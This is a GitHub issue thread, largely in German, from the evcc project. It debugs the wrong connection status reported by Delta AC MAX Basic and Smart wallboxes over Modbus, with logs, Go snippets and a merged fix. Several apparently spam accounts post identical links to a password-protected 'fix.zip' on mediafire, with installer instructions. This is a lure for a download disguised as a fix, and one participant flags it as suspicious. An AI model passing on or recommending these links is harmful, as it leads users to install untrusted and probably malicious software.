evcc-io/evcc #15697: Charger Delta AC MAX Basic (Modbus) wrong charger status

Felsblick, 2024-08-26:
### Describe the bug

With evcc 0.130.4 Wong charging status is reported with the Delta AC Max Basic. Although no vehicle is connected, evcc states connected vehicle. Refer to: 
https://github.com/evcc-io/evcc/issues/15592#issuecomment-2308994108

Proposed solution:
Implement register availability differentiation to find out if Delta AC Max basic or smart WB is used. AC max basic will report values on Register 1001, AC max Smart does not (only 1000 is available). For AC Max basic Register 1001 shall be used with mapping of evcc 0.128.4 and older, for AC Smart Register 1000 with mapping of evcc 0.130.4

### Steps to reproduce

1. Use evcc 0.130.4 and Delta AC Max basic with modbus

### Configuration details

```yaml
network:
  # schema is the HTTP schema
  # setting to `https` does not enable https, it only changes the way URLs are generated
  schema: http
  # host is the hostname or IP address
  # if the host name contains a `.local` suffix, the name will be announced on MDNS
  # docker: MDNS announcements don't work. host must be set to the docker host's name.
  host: homeassistant.local
  # port is the listening port for UI and api
  # evcc will listen on all available interfaces
  port: 7070

interval: 10s # control cycle interval. Interval <30s can lead to unexpected behavior, see https://docs.evcc.io/docs/reference/configuration/interval

# database configuration for persisting charge sessions and settings
# database:
#   type: sqlite
#   dsn: <path-to-db-file>

# sponsor token enables optional features (request at https://sponsor.evcc.io)

#
# Telemetry allows collecting usage data (grid and green energy, charge power).
# Data is aggregated, no individual charging sessions are tracked. The collected,
# anonymous data can be retrieved using https://api.evcc.io.
#
# See https://github.com/evcc-io/evcc/pull/4343 or details.
#
# For time being, this is only available to sponsors, hence data is associated with
# the sponsor token's identity.
#
telemetry: true
plant: 541a0cf6f79eba877ec6f6b860e0a20f0e708a7e3b3c409735fd7eb9b4afe439

# log settings
log: info
levels:
  site: debug
  lp-1: debug
  lp-2: debug
  cache: error
  db: error

# modbus proxy for allowing external programs to reuse the evcc modbus connection
# each entry will start a proxy instance at the given port speaking Modbus TCP and
# relaying to the given modbus downstream device (either TCP or RTU, RS485 or TCP)
modbusproxy:
  #  - port: 5200
  #    uri: solar-edge:502
  #    # rtu: true
  #    # readonly: true # use `deny` to raise modbus errors

# meter definitions
# name can be freely chosen and is used as reference when assigning meters to site and loadpoints
# for documentation see https://docs.evcc.io/docs/devices/meters
[... 221 lines cut ...]
  # - type: email
  #   uri: smtp://<user>:<password>@<host>:<port>/?fromAddress=<from>&toAddresses=<to>
  # - type: ntfy
  #   uri: https://<host>/<topics>
  #   priority: <priority>
  #   tags: <tags>
```

### Log details

```text
After startup when no vehicle is connected:
[delta ] TRACE 2024/08/26 10:00:32 modbus: send 01 04 03 e8 00 01 b1 ba
[delta ] TRACE 2024/08/26 10:00:32 modbus: recv 01 04 02 00 03 f9 31
[lp-1 ] DEBUG 2024/08/26 10:00:32 charger status: B
[lp-1 ] INFO 2024/08/26 10:00:32 car connected
```

### What type of operating system are you running?

HomeAssistant Add-on

### Version

0.130.4

swaggy111, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

HaxBaba123, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

pilot5657, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

madmat17, 2024-08-26:
Register 130 states the model name as string.
In my case (Delta AC MAX Smart) "EIAW-E22KTSE5A04", whereas...
EIAW-E22KTSE5A04 = Smart
EIAW-E22KTBE5A04 = Basic

Other parts of the model number string may vary (affixed cable vs. plug, 11kW vs. 22kW, EU version vs. US/other versions, etc).
Unfortunately I couldn't find an exhausted list of available SKUs. I would suggest implementing something like this:
https://github.com/evcc-io/evcc/compare/master...madmat17:evcc_delta:master#diff-6d9fb2ec3d3d401d69c4079b978d1c89d59bddfae6243ebeb45681a1ac125be5

No PR created yet, as I'm not a developer, nor do I have the time the upcoming days to test the code.
@premultiply: Would be so kind to have a look at the suggested changes? You most probably notice any quirks at first sight. ;-)

Thanks!

premultiply, 2024-08-26:
Let's keep it simple and try to access register 1001 during initialization and switch variants accordingly as suggested in https://github.com/evcc-io/evcc/issues/15592#issuecomment-2309498250 by @Felsblick

jia6214876, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

madmat17, 2024-08-27:
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

ALL, I highly discourage anyone from downloading any precompiled software from external sources. That post from @jia6214876 looks extremely suspicious!
@jia6214876 Please link to the respective GitHub repo.

madmat17, 2024-08-27:
> Let's keep it simple and try to access register 1001 during initialization and switch variants accordingly as suggested in [#15592 (comment)](https://github.com/evcc-io/evcc/issues/15592#issuecomment-2309498250) by @Felsblick

Like that one)
https://github.com/evcc-io/evcc/compare/master...madmat17:evcc_delta:master#diff-6d9fb2ec3d3d401d69c4079b978d1c89d59bddfae6243ebeb45681a1ac125be5

ESMELSTEPHANE24, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

TweetsOfNiklas, 2024-09-02:
Kann das Problem mit meinen 2 AC Basic nur bestätigen. Mit der 0.130.1 wurde das Problem gefixt. Seit der 0.130.3 wieder das Problem, dass die Ladestation ständig als verbunden angezeigt wird. Dadurch wird dann die geladene Menge und auch der Abfahrtstimer nie zurückgesetzt.

andig, 2024-09-07:
Wie kommen wir hier weiter? Falls 1001 Lesefehler mapping a, sonst mapping b? Was wären dann a und b?

Felsblick, 2024-09-07:
Hallo Andi,

wie im Test oben beschrieben:
For AC Max basic Register 1001 shall be used with mapping of evcc 0.128.4 and older, for AC Smart Register 1000 with mapping of evcc 0.130.4

Oder alternativ die Lösung von @madmat17 https://github.com/evcc-io/evcc/issues/15697#issuecomment-2311575027

andig, 2024-09-07:
Ein PR wäre Klasse!

Felsblick, 2024-09-07:
Oh, ich befürchte das übersteigt meine Kenntnisse, ich kann das nicht programmieren...
@madmat17 du vielleicht?

Felsblick, 2024-09-07:
Wenn ich ein klein wenig Nachhilfe bekomme kann ich den fix gerne auf meinem MacOS Testsystem ausprobieren. Brauch nur den Brew Befehl die entsprechende Version zu installieren.

Felsblick, 2024-09-08:
Danke euch auch! Ich habe es gleich getestet, leider nicht erfolgreich. Status 3 wieder wieder auf Charger Status B gemappt. Müsste aber A sein! Fahrzeug verbunden wird angezeigt, obwohl keines angeschlossen. 
```
delta ] TRACE 2024/09/08 19:32:28 modbus: send 01 04 03 e8 00 01 b1 ba
[delta ] TRACE 2024/09/08 19:32:28 modbus: recv 01 04 02 00 03 f9 31
[lp-1 ] DEBUG 2024/09/08 19:32:28 charger status: B
[lp-1 ] INFO 2024/09/08 19:32:28 car connected
```

@premultiply 
Du hattest gestern kurzzeitig die Lösung mit der „echten“ Weiche programmiert wo tatsächlich wieder das Register 1001 benutzt wurde. Warum nicht das umsetzen? Ich denke das ist die robustere Lösung. Das Register 1000 macht bei der Ac max Basic keinen Sinn.

premultiply, 2024-09-08:
Ich hab die Logik gedreht und leider vergessen den Init-Check auch anzupassen, sorry.
Wird korrigiert mit anderen Optimierungen.

Klaus3d3, 2024-09-11:
Das letzte Update macht den Connector Status an der Delta Max Smart leider wieder kaputt. Wird unconnected angezeigt, obwohl connected. Zurück auf 0.130.7 gehts wieder

madmat17, 2024-09-12:
@premultiply 
Wenn ich nicht ganz spinne, dann war auch das Setting des isBasic-Bools verdreht. Vielleicht hatte ich aber auch noch nicht genug Kaffee...

Ich habe hierzu folgenden PR erstellt: https://github.com/evcc-io/evcc/pull/16052

premultiply, 2024-09-12:
Siehe #15983

Felsblick, 2024-09-12:
> Siehe #15983
> 
> Bitte testen.
Wie bekomme ich den Branch mit Brew auf macOS? Oder kann mir jemand einen Weg beschreiben?

madmat17, 2024-09-13:
@premultiply 
Mit dem letzten Fix (eben die Nightly-Build installiert) wird das Fahrzeug mit der Smart-Variante noch immer nicht erkannt.
Charger Status bleibt auf "A", obwohl das Register 1000 auf "3" gewechselt hat.

Ich bin der Meinung, dass hier die Logik noch immer vertauscht ist:
```
	if _, err := wb.conn.ReadInputRegisters(wb.base+deltaRegEvseChargerState, 1); err != nil {
		wb.isBasic = true
	}
```

Wenn das Register nicht gelesen werden kann, dann handelt es sich nicht um eine RTU-Anbindung (= Basic), sondern um eine TCP-Anbindung (= Smart).
Mein PR https://github.com/evcc-io/evcc/pull/16052 hat den Schönheitstest nicht bestanden, aber ich denke, dass es damit klappen sollte.

premultiply, 2024-09-13:
Wie sollte das funktionieren wenn der PR noch überhaupt nicht gemerged ist?

madmat17, 2024-09-13:
Habe ich eben auch gerallt. Kann natürlich nicht...

madmat17, 2024-09-13:
Wird es eine Merge (und damit Binaries) deines Commits https://github.com/evcc-io/evcc/commit/b8d9203d757ef2b6203bdb08e6204a4f2950a7a2  geben?
Ich kann in meiner Umgebung leider nicht ohne weiteres kompilieren.

madmat17, 2024-09-13:
@premultiply 
Ich habe den Branch `fix/delta-status-decorated` (ergo https://github.com/evcc-io/evcc/pull/15983) in einer VM kompiliert und laufen lassen - Fahrzeugerkennung mit der **Delta AC Max Smart über Modbus TCP** funktioniert leider nicht.

Log:
```
[main ] INFO 2024/09/13 14:10:21 evcc 0.130.8 (b8d9203d)
[main ] INFO 2024/09/13 14:10:21 using config file: /mnt/c/tmp/_linux/evcc/evcc.yaml
[db ] INFO 2024/09/13 14:10:21 using sqlite database: /root/.evcc/evcc.db
[main ] INFO 2024/09/13 14:10:22 listening at :7070
[site ] INFO 2024/09/13 14:10:25 site config:
[site ] INFO 2024/09/13 14:10:25 meters: grid ✓ pv ✓ battery ✓
[site ] INFO 2024/09/13 14:10:25 grid: power ✓ energy ✓ currents ✓
[site ] INFO 2024/09/13 14:10:25 pv 1: power ✓ energy ✓ currents ✗
[site ] INFO 2024/09/13 14:10:25 battery 1: power ✓ energy ✓ currents ✗ soc ✓ capacity ✗
[site ] INFO 2024/09/13 14:10:25 vehicles:
[site ] INFO 2024/09/13 14:10:25 vehicle 1: range ✓ finish ✗ status ✓ climate ✗ wakeup ✓
[lp-1 ] INFO 2024/09/13 14:10:25 loadpoint 1:
[lp-1 ] INFO 2024/09/13 14:10:25 mode: off
[lp-1 ] INFO 2024/09/13 14:10:25 charger: power ✓ energy ✗ currents ✗ phases ✗ wakeup ✗
[lp-1 ] INFO 2024/09/13 14:10:25 meters: charge ✓
[lp-1 ] INFO 2024/09/13 14:10:25 charge: power ✓ energy ✗ currents ✗
[lp-1 ] DEBUG 2024/09/13 14:10:25 phase timer inactive
[lp-1 ] DEBUG 2024/09/13 14:10:25 pv timer inactive
[main ] INFO 2024/09/13 14:10:25 new version available: 0.130.9
[site ] DEBUG 2024/09/13 14:10:25 ----
[lp-1 ] DEBUG 2024/09/13 14:10:26 charge power: 0W
[site ] DEBUG 2024/09/13 14:10:30 pv power: 214W
[site ] DEBUG 2024/09/13 14:10:34 battery soc: 5%
[site ] DEBUG 2024/09/13 14:10:34 battery power: -43W
[site ] DEBUG 2024/09/13 14:10:36 grid meter: 1000W
[site ] DEBUG 2024/09/13 14:10:37 grid currents: [3.19 -0.66 1.51]A
[site ] DEBUG 2024/09/13 14:10:38 site power: 1057W
[lp-1 ] DEBUG 2024/09/13 14:10:39 charger status: A
[lp-1 ] INFO 2024/09/13 14:10:39 car disconnected
[lp-1 ] DEBUG 2024/09/13 14:10:39 set session soc limit: 0
[lp-1 ] DEBUG 2024/09/13 14:10:39 set session energy limit: 0
[site ] DEBUG 2024/09/13 14:10:55 ----
[lp-1 ] DEBUG 2024/09/13 14:10:56 charge power: 0W
[site ] DEBUG 2024/09/13 14:10:57 pv power: 219W
[site ] DEBUG 2024/09/13 14:10:58 battery soc: 5%
[site ] DEBUG 2024/09/13 14:10:58 battery power: -42W
[site ] DEBUG 2024/09/13 14:10:59 grid meter: 994W
[site ] DEBUG 2024/09/13 14:11:03 grid currents: [3.18 -0.66 3.12]A
[site ] DEBUG 2024/09/13 14:11:04 site power: 1052W
[lp-1 ] DEBUG 2024/09/13 14:11:05 charger status: A
[site ] DEBUG 2024/09/13 14:11:25 ----
[lp-1 ] DEBUG 2024/09/13 14:11:26 charge power: 0W
[site ] DEBUG 2024/09/13 14:11:26 pv power: 215W
[site ] DEBUG 2024/09/13 14:11:28 battery soc: 5%
[site ] DEBUG 2024/09/13 14:11:28 battery power: -43W
[site ] DEBUG 2024/09/13 14:11:30 grid meter: 951W
[site ] DEBUG 2024/09/13 14:11:35 grid currents: [3.17 -0.65 5.14]A
[site ] DEBUG 2024/09/13 14:11:40 site power: 1008W
[lp-1 ] DEBUG 2024/09/13 14:11:41 charger status: A
[site ] DEBUG 2024/09/13 14:11:55 ----
[lp-1 ] DEBUG 2024/09/13 14:11:56 charge power: 0W
[site ] DEBUG 2024/09/13 14:11:58 pv power: 219W
[site ] DEBUG 2024/09/13 14:12:01 battery soc: 5%
[site ] DEBUG 2024/09/13 14:12:01 battery power: -44W
[site ] DEBUG 2024/09/13 14:12:01 grid meter: 1139W
[site ] DEBUG 2024/09/13 14:12:05 grid currents: [3.2 -0.66 1.74]A
[site ] DEBUG 2024/09/13 14:12:05 site power: 1195W
[lp-1 ] DEBUG 2024/09/13 14:12:06 charger status: A
```

Wenn ich evcc in meiner VM beende und die Version 0.130.7 in meiner Live-Umgebung wieder starte, klappt die Erkennung:
```
[main ] INFO 2024/09/13 14:21:03 evcc 0.130.7
[main ] INFO 2024/09/13 14:21:03 using config file: /etc/evcc.yaml
[db ] INFO 2024/09/13 14:21:03 using sqlite database: /var/lib/evcc/evcc.db
[main ] INFO 2024/09/13 14:21:03 listening at :7070
[site ] INFO 2024/09/13 14:21:05 site config:
[site ] INFO 2024/09/13 14:21:05 meters: grid ✓ pv ✓ battery ✓
[site ] INFO 2024/09/13 14:21:05 grid: power ✓ energy ✓ currents ✓
[site ] INFO 2024/09/13 14:21:05 pv 1: power ✓ energy ✓ currents ✗
[site ] INFO 2024/09/13 14:21:05 battery 1: power ✓ energy ✓ currents ✗ soc ✓ capacity ✗
[site ] INFO 2024/09/13 14:21:05 vehicles:
[site ] INFO 2024/09/13 14:21:05 vehicle 1: range ✓ finish ✗ status ✓ climate ✗ wakeup ✓
[lp-1 ] INFO 2024/09/13 14:21:05 loadpoint 1:
[lp-1 ] INFO 2024/09/13 14:21:05 mode: off
[lp-1 ] INFO 2024/09/13 14:21:05 charger: power ✓ energy ✗ currents ✗ phases ✗ wakeup ✗
[lp-1 ] INFO 2024/09/13 14:21:05 meters: charge ✓
[lp-1 ] INFO 2024/09/13 14:21:05 charge: power ✓ energy ✗ currents ✗
[site ] DEBUG 2024/09/13 14:21:05 set buffer soc: 95
[site ] DEBUG 2024/09/13 14:21:05 set priority soc: 90
[site ] DEBUG 2024/09/13 14:21:05 set battery discharge control: true
[site ] DEBUG 2024/09/13 14:21:05 set grid charge limit: 0.0
[lp-1 ] DEBUG 2024/09/13 14:21:05 set smart cost limit: 0.1
[lp-1 ] DEBUG 2024/09/13 14:21:05 phase timer inactive
[lp-1 ] DEBUG 2024/09/13 14:21:05 pv timer inactive
[main ] INFO 2024/09/13 14:21:05 new version available: 0.130.9
[site ] DEBUG 2024/09/13 14:21:06 ----
[lp-1 ] DEBUG 2024/09/13 14:21:08 charge power: 0W
[site ] DEBUG 2024/09/13 14:21:10 pv power: 232W
[site ] DEBUG 2024/09/13 14:21:11 battery soc: 5%
[site ] DEBUG 2024/09/13 14:21:11 battery power: -44W
[site ] DEBUG 2024/09/13 14:21:12 grid meter: 1068W
[site ] DEBUG 2024/09/13 14:21:14 grid currents: [3.42 -0.67 1.39]A
[site ] DEBUG 2024/09/13 14:21:15 battery has priority at soc 5% (< 90%)
[site ] DEBUG 2024/09/13 14:21:15 site power: 1168W
[lp-1 ] DEBUG 2024/09/13 14:21:16 charger status: B
[lp-1 ] INFO 2024/09/13 14:21:16 car connected
```

Heute/morgen kann ich noch weitere Details liefern, wenn gewünscht/erfordert; danach bin ich für ein paar Tage verhindert.

Gruß,
Mat

madmat17, 2024-09-13:
Vielleicht kann/will jemand mit einer Delta AC Max Basic einmal den Compiler mit der delta.go aus diesem PR https://github.com/evcc-io/evcc/pull/16094 anstarten - mit der Smart läuft's.

@Felsblick
Über Brew bekommt man meines Wissens nur fertige Binaries. Aber evtl. hast du ja eine Linux-VM auf deinem MacOS laufen zum Kompilieren und Testen.
Ist hier ganz gut beschrieben: https://github.com/evcc-io/evcc/blob/master/CONTRIBUTING.md

Quick and dirty:
1. Go installieren
2. NodeJS installieren
3. evcc-io/evcc Repo klonen
4. delta.go durch den neuen Code aus dem PR ersetzen
5. `make install-ui` ausführen
6. `make install` ausführen
7. `make` ausführen
8. Deine `evcc.yaml` ins `evcc`-Verzeichnis kopieren
9. Das Programm mit `./evcc` starten

Felsblick, 2024-09-13:
Danke für die Starthilfe. Ich werde es am Wochenende probieren.

Felsblick, 2024-09-13:
...mal eine blöde Frage, ich glaube ich bin da einem Irrtum aufgessen, den mir eine falsche ChatGPT interpretation des codes eingebrockt hat.

Wenn über:
`err := wb.conn.ReadInputRegisters(wb.base+deltaRegEvseChargerState, 1)`
das Register abgefragt wird und es existiert, also ein Wert zurück kommt, was ist dann der Inhalt von err?
err == nil oder err ==  Rückgabewert der Registers also err !=nil ?

madmat17, 2024-09-13:
`err == nil` heißt, dass kein Fehler beim Abfragen des Registers erfolgt.
`err != nil` ist das Gegenteil zu ersterem.
Der Wert an sich wird nicht ausgewertet.

Felsblick, 2024-09-13:
So sagt es mir ChatGPT auch. Aber ist es korrekt? Ist err nicht einfach nur eine variable die mit dem Inhalt des Registers gefüllt wird, wenn es gelesen werden kann?

Felsblick, 2024-09-13:
> Ein PR wäre Klasse! Die unterschiedlichen Versionen lassen sich auch explizit durch unterschiedliche Templatetypen in einer Datei auseinander halten wenn es nicht per Autoerkennung erfolgen kann. Dann sollte die "alte" Version auch den alten Typennamen behalten.

man kann jetzt natürlich noch ewig weiter mit der Autoerkennung experimentieren, oder wie @andig vorgeschlagen hat auf die manuelle Unterscheidung gehen. Schließlich weiß der Besitzer ja, welche Version der Box er hat (basic oder smart). In den Docs sind sowieso schon beide Boxen getrennt aufgeführt... Ich wäre stark dafür. Denn dann werden die Probleme der basic nicht automatisch zu den Problemen der smart und umgekehrt...

madmat17, 2024-09-13:
Der Unterschied ist eigentlich nicht Basic/Smart, sondern RTU vs. TCP.
Mir persönlich ist es gleich, wie meine Wallbox erkannt wird - solange sie erkannt wird. 😉

Die Probleme mit den Unterschiedlichen Varianten lassen mich aber einen anderen Fehler im Code vermuten. In den älteren `delta.go` Versionen wurde das Register 1001 gar nicht abgerufen. Aber aus irgendeinem Grund kann die Basic aufgrund der RTU-Connection mit dem `StatusB` nichts anfangen, bzw. meldet das Register 1000 (oder die Routine dazu) nicht den Wert 3 nach dem Anschluss des Fahrzeugs - so meine Vermutung.

andig, 2024-09-13:
Dem Protokoll sind die übermittelten Daten oder Register völlig egal.

madmat17, 2024-09-13:
Das ist klar. Die Frage ist nur, was die Basic über RTU ausspuckt.
Eigentlich müssten beide Varianten mit demselben Code laufen.

premultiply, 2024-09-13:
Tun sie aber nicht.

Offensichtlich hat die Smart-Versionen keine native Modbus-Unterstützung, sondern dies scheint intern irgendwie mit einem Konverter auf/von OCPP übersetzt zu werden.
Jedenfalls vermittelt die Doku diesen Eindruck.

Dafür hat die (Smart bzw. der Konverter) dann aber auch kein Register 1001.

Da ergibt sich natürlich auch die Frage warum man die Box nicht gleich nativ mit OCPP betreibt?

Felsblick, 2024-09-13:
habe mich jetzt nochmal intensiv mit dem code aus https://github.com/evcc-io/evcc/pull/15983 beschäftigt und mit den alten Versionen die jeweils mit der einen oder andern box funktioniert haben. Ich glaube, dass ich den Fehler gefunden habe.  und er dürfte nur noch bei der smart vorhanden sein.
@madmat17 kannst du das bei dir testen in dem du den Block hier änderst:
Status 3 aus Register 1000 muss in der Funktion statusOCPP auf chargerstatus B gemappt sein, die Unterscheidung ist zwar im code, wird aber beide male auf A gemappt. Wahrscheinlich ein Tippfehler.
```
func (wb *Delta) statusOCPP() (api.ChargeStatus, error) {
 	b, err := wb.conn.ReadInputRegisters(wb.base+deltaRegEvseState, 1)
 	if err != nil {
 		return api.StatusNone, err
 @@ -156,44 +207,50 @@ func (wb *Delta) Status() (api.ChargeStatus, error) {
 	// 7: Suspended EVSE
 	// 8: Not ready
 	// 9: Faulted

 	switch s := encoding.Uint16(b); s {
 	case 0, 1, 2:
 		return api.StatusA, nil
 	case 3: // not used correctly by protocol conversion
 		return api.StatusA, nil
 	case 4:
 		return api.StatusC, nil
 	case 5, 6, 7:
 		return api.StatusB, nil
 	case 9: // not used correctly by protocol conversion
 		return api.StatusB, nil
```

Version

madmat17, 2024-09-14:
Warum nicht wie hier https://github.com/evcc-io/evcc/pull/16094 mit dem commit https://github.com/evcc-io/evcc/pull/16094/commits/a57a78355afd24bdefb71c1491de2560a6c8dc47 ?
Habe ich getestet und funktioniert (siehe oben).

premultiply, 2024-09-14:
Es geht nur hier drum #15983.
Bitte nicht noch mehr Nebenschauplätze aufmachen. Danke!

madmat17, 2024-09-14:
> Da ergibt sich natürlich auch die Frage warum man die Box nicht gleich nativ mit OCPP betreibt?

Die Frage nach OCPP:
Da gab es (zumindest noch vor 3 Monaten) massive Probleme mit der Box mit regelmäßigen Crashes. Box musste dann teilweise komplett auf Werkseinstellungen zurückgesetzt und neu eingerichtet werden, um sie nutzen zu können.

madmat17, 2024-09-14:
@premultiply 
> Offensichtlich hat die Smart-Versionen keine native Modbus-Unterstützung, sondern dies scheint intern irgendwie mit einem Konverter auf/von OCPP übersetzt zu werden.
> Jedenfalls vermittelt die Doku diesen Eindruck.

Das würde jedenfalls erklären, warum ein OCPP-Betrieb und ein paralleles Abfragen der Ladeleistung via Modbus die Box zum Absturz bringt - und warum man im Modbus TCP Betrieb nicht alle Register sieht...
Wo hast du in Doku dazu einen Hinweis gefunden?

andig, 2024-09-14:
PR ist gemerged.

closed 2024-09-14 by andig

TweetsOfNiklas, 2024-09-15:
Delta AC MAX Basic: Problem ist nicht gefixt. EVCC zeigt jetzt ständig "Nicht verbunden." an. Damit kann man jetzt nicht einmal mehr eine Ladung starten.

Felsblick, 2024-09-15:
> Delta AC MAX Basic: Problem ist nicht gefixt. EVCC zeigt jetzt ständig "Nicht verbunden." an. Damit kann man jetzt nicht einmal mehr eine Ladung starten.

Ist bis jetzt noch nicht offiziell im Release. Warte auf den nächsten und teste dann.

andig, 2024-09-15:
Machts Euch nicht so schwer. PR ist gemerged, also im Nightly...

Felsblick, 2024-09-15:
für die weniger geübten user (wie mich) gibts bei Nutzung von homeassistant add on oder auch der brew installation auf macOS leider keinen einfach weg den nightly build ausprobieren. Wenn doch, bitte info wie.

andig, 2024-09-15:
Niemand ist gezwungen, HA zu verwenden. In dem Fall hilft nur warten oder- auf dem Mac- selbst compilieren.

Felsblick, 2024-09-15:
Mit 0.130.11 funktioniert die AC Max basic nun.

PR #15963 (2024-09-08): Delta AC MAX Basic: fix status
Interpretation of the EVSE state register now dependent on the version of the charger (Smart = Modbus TCP; Basic = Serial).

Fixes #15697

- [x] detects model and switches status register accordingly
- [x] adds statusReason API